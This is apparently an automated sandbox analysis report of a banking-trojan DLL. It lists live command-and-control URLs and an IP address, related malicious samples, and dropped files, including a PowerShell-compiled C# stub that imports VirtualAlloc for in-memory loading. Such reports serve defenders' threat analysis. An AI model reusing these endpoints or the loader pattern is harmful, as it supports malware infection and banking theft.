                      http://185.189.151.28/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlktrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://185.189.151.28/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlktrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://185.189.151.28/rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://https://file://USER.ID%lu.exe/updrundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://185.189.151.28/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSrundll32.exe, 00000002.00000003.352335631.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.343411047.0000000003337000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.463215948.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352328086.0000000003338000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.osofts/Microt0powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://185.189.151.28/drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://constitution.org/usdeclar.txtrundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crl.micropowershell.exe, 00000012.00000003.416780801.000001E636303000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.559953766.000001E636304000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://185.189.151.28/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2rundll32.exe, 00000002.00000003.352335631.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.463215948.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352389329.0000000003305000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://constitution.org/usdeclar.txtC:rundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.189.151.28
                      		unknownSwitzerland
                      		51395AS-SOFTPLUSCHtrue

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:620332
                      Start date and time: 04/05/202216:25:582022-05-04 16:25:58 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 12m 32s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:xaj0e933Uv.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:38
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.bank.troj.evad.winDLL@25/17@0/1
                      EGA Information:
                      • Successful, ratio: 50%
                      HDC Information:
                      • Successful, ratio: 19.9% (good quality ratio 19.1%)
                      • Quality average: 82.2%
                      • Quality standard deviation: 27.1%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 112
                      • Number of non-executed functions: 210
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 13.107.43.16
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, config.edge.skype.com
                      • Execution Graph export aborted for target mshta.exe, PID 6548 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      16:27:23API Interceptor1x Sleep call for process: rundll32.exe modified
                      16:28:07API Interceptor36x Sleep call for process: powershell.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      185.189.151.28qOfIxt1fnQ.dllGet hashmaliciousBrowse
                        2oCOO5LbPu.dllGet hashmaliciousBrowse
                          rXN8OIpbzz.dllGet hashmaliciousBrowse
                            GlJdt15gDI.dllGet hashmaliciousBrowse

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              l-0007.l-dc-msedge.net2oCOO5LbPu.dllGet hashmaliciousBrowse
                              • 13.107.43.16
                              rXN8OIpbzz.dllGet hashmaliciousBrowse
                              • 13.107.43.16
                              Invoice#396.htmlGet hashmaliciousBrowse
                              • 13.107.43.16
                              Urgentn#U00a1 objedn#U00a0vka.pdf.exeGet hashmaliciousBrowse
                              • 13.107.43.16
                              pDut.dllGet hashmaliciousBrowse
                              • 13.107.43.16
                              HxEWwh74qT.dllGet hashmaliciousBrowse
                              • 13.107.43.16
                              6253ed88d7cd5.dllGet hashmaliciousBrowse
                              • 13.107.43.16
                              624c84a8263d3.dllGet hashmaliciousBrowse
                              • 13.107.43.16

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              AS-SOFTPLUSCHqOfIxt1fnQ.dllGet hashmaliciousBrowse
                              • 185.189.151.28
                              2oCOO5LbPu.dllGet hashmaliciousBrowse
                              • 185.189.151.28
                              rXN8OIpbzz.dllGet hashmaliciousBrowse
                              • 185.189.151.28
                              GlJdt15gDI.dllGet hashmaliciousBrowse
                              • 185.189.151.28
                              o52M6ZqBFpGet hashmaliciousBrowse
                              • 176.10.116.173
                              com.abbondioendrizzi.tools.supercleaner-9-apkplz.net.apkGet hashmaliciousBrowse
                              • 176.10.119.156
                              com.pagnotto28.sellsourcecode.supercleaner-9-apkplz.net.apkGet hashmaliciousBrowse
                              • 176.10.119.156
                              com.pagnotto28.sellsourcecode.alpha-6-apkplz.net.apkGet hashmaliciousBrowse
                              • 176.10.119.156
                              URGENT REQUEST FOR QUOTE_____Pdf.exeGet hashmaliciousBrowse
                              • 91.192.100.6
                              Powerful Cleaner Antivirus_v1.9.apkGet hashmaliciousBrowse
                              • 176.10.119.156
                              K74MviOR7dGet hashmaliciousBrowse
                              • 185.189.149.113
                              xIOggpNWfl.exeGet hashmaliciousBrowse
                              • 176.10.107.180
                              2X3f1ykTmM.exeGet hashmaliciousBrowse
                              • 176.10.99.208
                              lwRhzjuYIg.exeGet hashmaliciousBrowse
                              • 176.10.99.203
                              d03hwI54V0.exeGet hashmaliciousBrowse
                              • 176.10.104.240
                              tbsvrGet hashmaliciousBrowse
                              • 176.10.107.180
                              1p1EpP7mrs.exeGet hashmaliciousBrowse
                              • 185.189.151.142
                              yxvnSxhHKvGet hashmaliciousBrowse
                              • 91.201.59.197
                              xTvIsmAee2.exeGet hashmaliciousBrowse
                              • 176.10.119.29
                              b6pQZxxOuM.exeGet hashmaliciousBrowse
                              • 176.10.119.29

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11606
                              Entropy (8bit):4.8910535897909355
                              Encrypted:false
                              SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ
                              MD5:F84F6C99316F038F964F3A6DB900038F
                              SHA1:C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1
                              SHA-256:F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E
                              SHA-512:E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31
                              Malicious:false
                              Preview:PSMODULECACHE.....7B\.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........3......[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1192
                              Entropy (8bit):5.325275554903011
                              Encrypted:false
                              SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                              MD5:05CF074042A017A42C1877FC5DB819AB
                              SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                              SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                              SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                              Malicious:false
                              Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                              C:\Users\user\AppData\Local\Temp\RES5F15.tmp

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                              Category:dropped
                              Size (bytes):1328
                              Entropy (8bit):3.9748061757983675
                              Encrypted:false
                              SSDEEP:24:HTe9EuZf4UzDfHUhKdNWI+ycuZhN6xakSl2PNnq9qd:6B4oGKd41ulQa3cq9K
                              MD5:B25228E0D789A80CC458BDEDCA074352
                              SHA1:D02F77745E89EDE624F705B49991653478861CDE
                              SHA-256:AB6DDC0161E42079AAE33ED2D5CCF08861E963F50203059A1B641D41CA9E5951
                              SHA-512:471FF8CBFD71FE1088146FB506BCDC2120CB1515298F68644F898D49205EEA7F198A97AECC990E6438216F0798B785D2B31CBC597AA2180802AA0B0A53491E62
                              Malicious:false
                              Preview:L...~.rb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP................'...4..0...."..b..........4.......C:\Users\user\AppData\Local\Temp\RES5F15.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.5.p.o.d.5.s.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                              C:\Users\user\AppData\Local\Temp\RES73F5.tmp

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                              Category:dropped
                              Size (bytes):1328
                              Entropy (8bit):3.9834931582727697
                              Encrypted:false
                              SSDEEP:24:H5e9EuZfO5XDfH+hKdNWI+ycuZhN9akS7PNnq9qd:wBO5z0Kd41ul9a3xq9K
                              MD5:3216E688A820A84F56F4B051422672D5
                              SHA1:66A45E83433BA569C1539A55EE95B8715BF3CDB9
                              SHA-256:E6B505EA1803ACB819A72DA55DA55A8A45047CB9F64D02682F7B0FB190372B29
                              SHA-512:2598C34B7B84CA677422F49B86FD1D96672987E4D9CA6B4DA2392E336B0B458B914C635D059A3F0CA302B14CC1BDD06ADF374EA095B9051011B42558CAC37297
                              Malicious:false
                              Preview:L.....rb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP................GgU.V...?.FQ.n...........4.......C:\Users\user\AppData\Local\Temp\RES73F5.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.1.g.x.k.o.1.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgqpx5l1.q4z.psm1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Preview:1

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkorezbb.opv.ps1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Preview:1

                              C:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:MSVC .res
                              Category:dropped
                              Size (bytes):652
                              Entropy (8bit):3.1141398576088117
                              Encrypted:false
                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryvak7Ynqq7PN5Dlq5J:+RI+ycuZhN9akS7PNnqX
                              MD5:476755BF56A208B33F9C4651A06EE5A5
                              SHA1:828C47F319540793ABFD06234431820E5594A420
                              SHA-256:EB5CB6796AF4525D3264AC6A5E123A6D682A1C8431FAFC244EAD44DA8046F91C
                              SHA-512:4B7FA176700A57354909997E6F70515F57BB61EBADE429B16262BA5BA8C90755F068EB6AF13954BB3FD39911D27DFAAC6C94A10B90F20CAFA1DE647D84F69C42
                              Malicious:false
                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.1.g.x.k.o.1.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.1.g.x.k.o.1.5...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                              C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.0.cs

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text
                              Category:dropped
                              Size (bytes):392
                              Entropy (8bit):4.988829579018284
                              Encrypted:false
                              SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                              MD5:80545CB568082AB66554E902D9291782
                              SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                              SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                              SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                              Malicious:false
                              Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.

                              C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                              Category:dropped
                              Size (bytes):369
                              Entropy (8bit):5.283593156851968
                              Encrypted:false
                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fp1vOBzxs7+AEszIwkn23fp1vOM:p37Lvkmb6KRfBAWZEifB9
                              MD5:9BA74AF8C7DB03DB598E428C80A39C24
                              SHA1:1118FB7E3A74DEDA5A4E7C1C7D1B054CBE5C6E1C
                              SHA-256:29709DDB56A51411468E1EF4A5C98A0CFC749ACB37E58B6BD3574F0F2D302722
                              SHA-512:6B24DA377F68A32BCBD70C00CCCB521CB67A6353A2BD06E7C811A50E67F2BD83F3F79BA9CFCE53747E3F507453EF1E12734BBF9BF3FA413A8827BDA4EB3F66D9
                              Malicious:false
                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.0.cs"

                              C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.dll

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):3584
                              Entropy (8bit):2.600576810696372
                              Encrypted:false
                              SSDEEP:24:etGSa/u2Bg85z7xlfwZD6lgdWqtkZf3rtWI+ycuZhN9akS7PNnq:6fYb5hFCD6wWdJ3rY1ul9a3xq
                              MD5:DB32AF94E50432F083E1DEA228EEF8D4
                              SHA1:7BA5E52289B5D9BBAEB3647F32315FB9AFE0BE9E
                              SHA-256:C91C4DB3E42338BB928B22C4207308E4153D45AEC8F734030CED671F0EAE83BD
                              SHA-512:7AFE704910CF7B27D4D9F756F18B47A159C474B6868378CE68EE105D63AF3E0F5CEEC1DEA5539CFED4DA1E76DA73DA353D16319E63E9F200493486314BDC3C75
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rb...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......`.........f.....o.....s.....z...............`. ...`...!.`.%...`.......*.....3.+.....9.......K.......S...........

                              C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.out

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                              Category:modified
                              Size (bytes):866
                              Entropy (8bit):5.346663629193138
                              Encrypted:false
                              SSDEEP:24:AId3ka6KRfDEifeKaM5DqBVKVrdFAMBJTH:Akka6CDEueKxDcVKdBJj
                              MD5:2F9D5A7D317AB29D714CEFE888F56699
                              SHA1:2DE49F06FDE6EAD8ED5886B017B874FAFBCD6356
                              SHA-256:728FA4B4FD272923E395304FA5B40B1F2F98C4D39B88F1BCEDCF81287C9F4EFB
                              SHA-512:6591BE1739BFA8EB5998A6679F865EE3A07363FFA028E0317B73F79ECAEA7675B4BCC16086B425EE74B422898E98874C7C803C5ADB00FD71088CB007A5017069
                              Malicious:false
                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                              C:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:MSVC .res
                              Category:dropped
                              Size (bytes):652
                              Entropy (8bit):3.093636689580821
                              Encrypted:false
                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grycxak7Ynqql2PN5Dlq5J:+RI+ycuZhN6xakSl2PNnqX
                              MD5:27A58DEC34A8A930EAF493E122C1D762
                              SHA1:84E4A3CA94FA31FF623DE9EE39782AC021D93B32
                              SHA-256:C9EEA11CDD016DF97932732100DF2AE3F3250F3C49A9270F0BA04F444096B665
                              SHA-512:D267C3F6B444275A3B32A42010F7352D7DC5098A10A5B0A5FAD5D7E0B79F286BD5BC45B9D94BE1A07B65195B9D90CCE58FE4E2F9E93E708C41702CE97F1F3074
                              Malicious:false
                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.5.p.o.d.5.s.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.5.p.o.d.5.s.5...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                              C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.0.cs

                              Download File
